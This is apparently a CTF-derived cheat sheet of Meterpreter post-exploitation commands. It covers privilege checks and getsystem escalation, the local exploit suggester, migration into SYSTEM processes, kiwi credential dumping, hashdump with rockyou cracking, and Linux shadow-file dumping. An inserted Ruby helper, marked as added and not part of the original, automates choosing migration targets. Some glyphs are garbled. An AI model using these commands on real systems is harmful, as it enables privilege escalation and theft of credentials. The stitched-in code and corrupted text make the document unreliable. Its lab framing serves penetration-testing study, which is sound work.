Meterpreter exploitation commands

  • ➡️ Check whether you are root/SYSTEM and what privileges you have
meterpreter> getuid
Windows: NT AUTHORITY\SYSTEM
  • ➡️ Learn more about the system. On Windows, the build version lets you look up known CVEs. The architecture helps too, as some scripts are less useful on some architectures.
meterpreter> sysinfo
Computer        : XXX-PC
OS              : Windows X (... Build xxx...).
Architecture    : x64
  • ➡️ Start a shell: sh/bash on Linux, cmd on Windows
meterpreter> shell # start a shell on the target
C:\WINDOWS\system32> # Windows cmd prompt
  • ➡️ Ask for suggested exploits. ⚠️ Before running them, migrate to a stable process with the highest privileges you can obtain.
meterpreter> run post/multi/recon/local_exploit_suggester
  • ➡️ Load a local file commands.txt containing meterpreter commands and run them
meterpreter> resource commands.txt
  • ➑️ πŸ“ Migrate to another process πŸ“. This is something as some services/stuff need us to be "in" a process that has the same architecture, and the same permissions, that our target. Usually, any process run by "NT AUTHORITY\SYSTEM"/root should be okay, although you may have to try a few times.
meterpreter> ps # list process
meterpreter> migrate process_pid # move to another process
meterpreter> migrate -N process_name # same
meterpreter> # most used ones
meterpreter> migrate -N spoolsv.exe # can restart so good
meterpreter> migrate -N explorer.exe # screenshots...
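The selection rule above (same architecture, SYSTEM user, spoolsv.exe/explorer.exe preferred) applied to a saved `ps` listing, as an added example that is not part of the original cheat sheet and not Metasploit code; the same rule is what "some_process_nt_system_compatible" in the kiwi section stands for. It assumes the `ps` table separates columns by two or more spaces, and the listing below is constructed.

```ruby
# Constructed Meterpreter `ps` output (not a real capture). Single-quoted heredoc
# so the Windows backslashes are kept literally.
SAMPLE_PS = <<~'PS'
  Process List
  ============

   PID   PPID  Name               Arch  Session  User                 Path
   ---   ----  ----               ----  -------  ----                 ----
   0     0     [System Process]
   4     0     System             x64   0
   620   516   services.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe
   752   620   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
   1100  1060  explorer.exe       x64   1        XXX-PC\bob           C:\Windows\explorer.exe
   1844  620   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\Windows\SysWOW64\svchost.exe
   2312  2080  notepad.exe        x64   1        XXX-PC\bob           C:\Windows\System32\notepad.exe
PS

ProcEntry = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Order expresses the preference given in the cheat sheet above.
PREFERRED = %w[spoolsv.exe explorer.exe].freeze

# Parse the `ps` table. Columns are split on runs of two or more spaces because a
# user like "NT AUTHORITY\SYSTEM" contains a single space. Rows without an Arch
# and User column (e.g. "[System Process]") carry nothing we can match on and
# are skipped, as are the header and separator rows.
def parse_ps(text)
  text.each_line.map do |line|
    cols = line.strip.split(/\s{2,}/)
    next unless cols.size >= 6 && cols[0] =~ /\A\d+\z/ && cols[1] =~ /\A\d+\z/
    ProcEntry.new(cols[0].to_i, cols[1].to_i, cols[2], cols[3], cols[4], cols[5], cols[6])
  end.compact
end

# Processes that satisfy the rule, best candidate first: matching architecture,
# running as NT AUTHORITY\SYSTEM, preferred names ahead of the rest, then by PID.
def migration_candidates(procs, session_arch)
  fitting = procs.select do |p|
    p.arch == session_arch && p.user.casecmp?('NT AUTHORITY\SYSTEM')
  end
  fitting.sort_by { |p| [PREFERRED.index(p.name.downcase) || PREFERRED.size, p.pid] }
end

if __FILE__ == $PROGRAM_NAME
  # For an x64 session this lists spoolsv.exe (752) before services.exe (620).
  migration_candidates(parse_ps(SAMPLE_PS), 'x64').each do |p|
    puts "#{p.pid}\t#{p.name}\t#{p.user}"
  end
end
```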

Windows commands

blue ice blaster steelmountain

  • ➡️ See your privileges
meterpreter> getprivs # list the privileges of the current token
meterpreter> getsystem # try to elevate to NT AUTHORITY\SYSTEM
  • ➡️ Load PowerShell
meterpreter> load powershell
meterpreter> powershell_shell
PS>
  • ➡️ Dump in-memory passwords
meterpreter> load kiwi
meterpreter> migrate some_process_nt_system_compatible # a SYSTEM process with the session's architecture
meterpreter> creds_all # retrieve all credentials
meterpreter> # you can also create a backdoor...
meterpreter> hashdump
# You may try to crack the hashes with John from within msfconsole
msf6 exploit('module_used')> use auxiliary/analyze/crack_windows
msf6 exploit('module_used')> set CUSTOM_WORDLIST /usr/share/wordlists/rockyou.txt
msf6 exploit('module_used')> run

Linux commands

  • ➡️ Start a shell
meterpreter> shell
$
# basically, all this module does is "cat /etc/shadow"
meterpreter> bg # background the session and return to msfconsole
msf6 exploit('module_used')> use post/linux/gather/hashdump
msf6 exploit('module_used')> set SESSION 1
msf6 exploit('module_used')> run